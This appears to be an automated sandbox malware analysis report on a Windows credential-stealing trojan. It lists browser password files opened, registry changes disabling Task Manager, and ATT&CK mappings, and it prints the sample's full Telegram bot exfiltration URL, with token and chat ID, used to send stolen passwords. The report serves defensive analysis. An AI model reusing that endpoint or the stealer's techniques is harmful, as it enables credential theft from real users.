            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594516Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594406Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594297Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594172Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594063Jump to behavior
            Source: 14lVOjBoI2.exe, 00000005.00000002.2649241318.000000000600A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}v
            Source: 14lVOjBoI2.exe, 00000005.00000002.2649241318.0000000005FA8000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2649241318.000000000600A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeAPI call chain: ExitProcess graph end nodegraph_0-3943
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeAPI call chain: ExitProcess graph end nodegraph_0-3763
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess created: C:\Users\user\Desktop\14lVOjBoI2.exe "C:\Users\user\Desktop\14lVOjBoI2.exe"Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeQueries volume information: C:\Users\user\Desktop\14lVOjBoI2.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 14lVOjBoI2.exe PID: 8088, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 14lVOjBoI2.exe PID: 8088, type: MEMORYSTR
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 14lVOjBoI2.exe PID: 8088, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 14lVOjBoI2.exe PID: 8088, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 14lVOjBoI2.exe PID: 8088, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            14lVOjBoI2.exe55%ReversingLabsWin32.Trojan.Generic
            14lVOjBoI2.exe65%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsr675C.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsr675C.tmp\System.dll0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.185.142
            truefalse
              high
              drive.usercontent.google.com
              216.58.206.65
              truefalse
                high
                reallyfreegeoip.org
                104.21.32.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://drive.google.com/?14lVOjBoI2.exe, 00000005.00000002.2649241318.0000000005FA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://www.google.com14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=689714lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036792000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036732000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.js14lVOjBoI2.exe, 00000005.00000003.2246178651.0000000006022000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.google.com/14lVOjBoI2.exe, 00000005.00000002.2649241318.0000000005FA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.org14lVOjBoI2.exe, 00000005.00000002.2670933518.00000000365A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.org14lVOjBoI2.exe, 00000005.00000002.2670933518.000000003658F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/14lVOjBoI2.exe, 00000005.00000002.2649241318.000000000601C000.00000004.00000020.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000003.2277509572.0000000006022000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.org14lVOjBoI2.exe, 00000005.00000002.2670933518.000000003658F000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036584000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036792000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036732000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://apis.google.com14lVOjBoI2.exe, 00000005.00000003.2246237869.0000000006022000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.com14lVOjBoI2.exe, 00000005.00000002.2670933518.000000003658F000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036792000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036732000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorError14lVOjBoI2.exefalse
                                                          high
                                                          http://api.telegram.org14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036792000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036732000.00000004.00000800.00020000.00000000.sdmp, 14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name14lVOjBoI2.exe, 00000005.00000002.2670933518.0000000036511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://reallyfreegeoip.org/xml/14lVOjBoI2.exe, 00000005.00000002.2670933518.000000003658F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                149.154.167.220
                                                                api.telegram.orgUnited Kingdom
                                                                62041TELEGRAMRUfalse
                                                                142.250.185.142
                                                                drive.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                104.21.32.1
                                                                reallyfreegeoip.orgUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                216.58.206.65
                                                                drive.usercontent.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                132.226.247.73
                                                                checkip.dyndns.comUnited States
                                                                16989UTMEMUSfalse
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1588928
                                                                Start date and time:2025-01-11 07:17:38 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 7m 35s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:8
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:14lVOjBoI2.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:ad3b51ce98d8e69775168649d8b4ffbee80c182b3fdb6cfa7f964548c70e9e75.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 95%
                                                                • Number of executed functions: 147
                                                                • Number of non-executed functions: 109
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 172.202.163.200
                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                TimeTypeDescription
                                                                01:20:24API Interceptor113x Sleep call for process: 14lVOjBoI2.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                149.154.167.220Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                      lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                          4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    104.21.32.1BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.aziziyeescortg.xyz/2pcx/
                                                                                    25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.masterqq.pro/3vdc/
                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.mzkd6gp5.top/3u0p/
                                                                                    SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                    • redroomaudio.com/administrator/index.php
                                                                                    132.226.247.73rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    reallyfreegeoip.orgQg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.64.1
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.32.1
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.16.1
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.48.1
                                                                                    wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.48.1
                                                                                    checkip.dyndns.comQg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 193.122.130.0
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 158.101.44.242
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 158.101.44.242
                                                                                    api.telegram.orgQg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    TELEGRAMRUQg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    UTMEMUSrlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 132.226.8.169
                                                                                    uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    CLOUDFLARENETUSQg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.64.1
                                                                                    fqbVL4XxCr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 104.21.112.1
                                                                                    JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 172.67.74.152
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.32.1
                                                                                    962Zrwh5bU.exeGet hashmaliciousAzorultBrowse
                                                                                    • 104.21.75.48
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.16.1
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                                    • 172.64.155.59
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    54328bd36c14bd82ddaa0c04b25ed9adQg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.32.1
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.32.1
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.32.1
                                                                                    3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.32.1
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.32.1
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.32.1
                                                                                    prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.32.1
                                                                                    rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.32.1
                                                                                    wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.32.1
                                                                                    prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.32.1
                                                                                    3b5074b1b5d032e5620f69f9f700ff0eQg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
